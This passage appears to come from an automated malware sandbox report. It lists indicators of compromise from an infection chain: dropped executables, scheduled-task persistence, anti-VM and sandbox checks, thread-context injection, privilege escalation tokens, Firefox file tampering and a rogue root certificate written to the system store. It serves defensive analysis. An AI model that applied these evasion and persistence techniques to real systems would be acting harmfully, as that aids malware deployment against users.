File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	QVm3NMEvSDXvgsDecjeqkD2d.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	ZWmybuD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	dzqjbCr.exe
File opened for modification	C:\Windows\System32\GroupPolicy	QVm3NMEvSDXvgsDecjeqkD2d.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
208	explorha.exe
1328	explorha.exe
5772	QVm3NMEvSDXvgsDecjeqkD2d.exe
5532	explorha.exe
4248	explorha.exe
2052	explorha.exe
5232	explorha.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4456 set thread context of 4496	4456	swiiiii.exe	75
PID 1560 set thread context of 3848	1560	swiiii.exe	81
PID 1028 set thread context of 3076	1028	gold.exe	87
PID 2316 set thread context of 3888	2316	file300un.exe	90
PID 1124 set thread context of 4620	1124	alexxxxxxxx.exe	104

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 5 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	uEAAbQEzg9PcN7EIkFWxWns4.exe
File opened (read-only)	\??\VBoxMiniRdrDN	8It8hjPMoumclIlCgjwjVbXd.exe
File opened (read-only)	\??\VBoxMiniRdrDN	4767d2e713f2021e8fe856e3ea638b58.exe
File opened (read-only)	\??\VBoxMiniRdrDN	GzmpmDfyoCO6lj4EiC4zaiUe.exe
File opened (read-only)	\??\VBoxMiniRdrDN	9AtHbSgIGRVSfqxpWWxVr0VR.exe

Drops file in Program Files directory 39 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\DQANlvmTAvZU2\aEDSYAr.xml	dzqjbCr.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\jRCSBaN.dll	dzqjbCr.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\iJmIOaygSaeWk.dll	dzqjbCr.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\ifJFebI.xml	dzqjbCr.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\ZYLKlqP.dll	dzqjbCr.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\HOqgBom.dll	ZWmybuD.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\nFckzRJ.dll	dzqjbCr.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	ZWmybuD.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\RipVPWOhnCuld.dll	ZWmybuD.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\jGUCkRd.xml	dzqjbCr.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\ADJLsahCU\JIagaW.dll	dzqjbCr.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	dzqjbCr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	dzqjbCr.exe
File created	C:\Program Files (x86)\ADJLsahCU\lGMFQHr.xml	ZWmybuD.exe
File created	C:\Program Files (x86)\ADJLsahCU\soHoNeH.xml	dzqjbCr.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	dzqjbCr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	dzqjbCr.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\nJavhaM.xml	ZWmybuD.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\zmYGBRd.dll	ZWmybuD.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\nXYyLCf.dll	ZWmybuD.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\sbVuxna.xml	ZWmybuD.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	dzqjbCr.exe
File created	C:\Program Files (x86)\ADJLsahCU\iVWhCl.dll	ZWmybuD.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	ZWmybuD.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\sHuCYex.xml	ZWmybuD.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\explorha.job	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	GzmpmDfyoCO6lj4EiC4zaiUe.exe
File opened for modification	C:\Windows\rss	uEAAbQEzg9PcN7EIkFWxWns4.exe
File opened for modification	C:\Windows\rss	4767d2e713f2021e8fe856e3ea638b58.exe
File created	C:\Windows\rss\csrss.exe	4767d2e713f2021e8fe856e3ea638b58.exe
File opened for modification	C:\Windows\rss	9AtHbSgIGRVSfqxpWWxVr0VR.exe
File opened for modification	C:\Windows\rss	8It8hjPMoumclIlCgjwjVbXd.exe
File created	C:\Windows\rss\csrss.exe	8It8hjPMoumclIlCgjwjVbXd.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File opened for modification	C:\Windows\rss	GzmpmDfyoCO6lj4EiC4zaiUe.exe
File created	C:\Windows\rss\csrss.exe	9AtHbSgIGRVSfqxpWWxVr0VR.exe
File created	C:\Windows\rss\csrss.exe	uEAAbQEzg9PcN7EIkFWxWns4.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1604	sc.exe
2268	sc.exe
1560	sc.exe
2516	sc.exe
5204	sc.exe
5500	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4708	4456	WerFault.exe	73
1896	1124	WerFault.exe	101
5656	5972	WerFault.exe	156

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1lc.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u468.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u468.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1lc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1lc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u468.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1lc.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1lc.0.exe

Creates scheduled task(s) 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5764	schtasks.exe
4120	schtasks.exe
3400	schtasks.exe
1424	schtasks.exe
5852	schtasks.exe
6136	schtasks.exe
5268	schtasks.exe
5984	schtasks.exe
5300	schtasks.exe
2496	schtasks.exe
5480	schtasks.exe
4964	schtasks.exe
6068	schtasks.exe
5372	schtasks.exe
688	schtasks.exe
5828	schtasks.exe
5024	schtasks.exe
5156	schtasks.exe
2676	schtasks.exe
5836	schtasks.exe
2364	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2061 = "North Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
208	explorha.exe
208	explorha.exe
608	powershell.exe
608	powershell.exe
608	powershell.exe
608	powershell.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
1604	jok.exe
1604	jok.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
776	rundll32.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
2348	keks.exe
2348	keks.exe
2348	keks.exe
2348	keks.exe
2000	GameService.exe
2000	GameService.exe
576	trf.exe
576	trf.exe
5272	GameService.exe
5272	GameService.exe
2000	GameService.exe
2000	GameService.exe
5620	GameService.exe
5620	GameService.exe
5272	GameService.exe
5272	GameService.exe
5620	GameService.exe
5620	GameService.exe
2000	GameService.exe
2000	GameService.exe
1328	explorha.exe
1328	explorha.exe
5272	GameService.exe
5272	GameService.exe
5620	GameService.exe
5620	GameService.exe
5800	powershell.exe
5800	powershell.exe
1604	jok.exe
1604	jok.exe
5800	powershell.exe
5800	powershell.exe
5180	powershell.exe
5180	powershell.exe
5180	powershell.exe
5180	powershell.exe
6100	powershell.exe
6100	powershell.exe
6100	powershell.exe
6100	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2316	file300un.exe
Token: SeDebugPrivilege	608	powershell.exe
Token: SeDebugPrivilege	3888	regasm.exe
Token: SeIncreaseQuotaPrivilege	608	powershell.exe
Token: SeSecurityPrivilege	608	powershell.exe
Token: SeTakeOwnershipPrivilege	608	powershell.exe
Token: SeLoadDriverPrivilege	608	powershell.exe
Token: SeSystemProfilePrivilege	608	powershell.exe
Token: SeSystemtimePrivilege	608	powershell.exe
Token: SeProfSingleProcessPrivilege	608	powershell.exe
Token: SeIncBasePriorityPrivilege	608	powershell.exe
Token: SeCreatePagefilePrivilege	608	powershell.exe
Token: SeBackupPrivilege	608	powershell.exe
Token: SeRestorePrivilege	608	powershell.exe
Token: SeShutdownPrivilege	608	powershell.exe
Token: SeDebugPrivilege	608	powershell.exe
Token: SeSystemEnvironmentPrivilege	608	powershell.exe
Token: SeRemoteShutdownPrivilege	608	powershell.exe
Token: SeUndockPrivilege	608	powershell.exe
Token: SeManageVolumePrivilege	608	powershell.exe
Token: 33	608	powershell.exe
Token: 34	608	powershell.exe
Token: 35	608	powershell.exe
Token: 36	608	powershell.exe
Token: SeDebugPrivilege	1604	jok.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	576	trf.exe
Token: SeDebugPrivilege	2348	keks.exe
Token: SeBackupPrivilege	576	trf.exe
Token: SeSecurityPrivilege	576	trf.exe
Token: SeSecurityPrivilege	576	trf.exe
Token: SeSecurityPrivilege	576	trf.exe
Token: SeSecurityPrivilege	576	trf.exe
Token: SeDebugPrivilege	4620	RegAsm.exe
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeDebugPrivilege	5180	powershell.exe
Token: SeIncreaseQuotaPrivilege	4204	WMIC.exe
Token: SeSecurityPrivilege	4204	WMIC.exe
Token: SeTakeOwnershipPrivilege	4204	WMIC.exe
Token: SeLoadDriverPrivilege	4204	WMIC.exe
Token: SeSystemProfilePrivilege	4204	WMIC.exe
Token: SeSystemtimePrivilege	4204	WMIC.exe
Token: SeProfSingleProcessPrivilege	4204	WMIC.exe
Token: SeIncBasePriorityPrivilege	4204	WMIC.exe
Token: SeCreatePagefilePrivilege	4204	WMIC.exe
Token: SeBackupPrivilege	4204	WMIC.exe
Token: SeRestorePrivilege	4204	WMIC.exe
Token: SeShutdownPrivilege	4204	WMIC.exe
Token: SeDebugPrivilege	4204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4204	WMIC.exe
Token: SeRemoteShutdownPrivilege	4204	WMIC.exe
Token: SeUndockPrivilege	4204	WMIC.exe
Token: SeManageVolumePrivilege	4204	WMIC.exe
Token: 33	4204	WMIC.exe
Token: 34	4204	WMIC.exe
Token: 35	4204	WMIC.exe
Token: 36	4204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4204	WMIC.exe
Token: SeSecurityPrivilege	4204	WMIC.exe
Token: SeTakeOwnershipPrivilege	4204	WMIC.exe
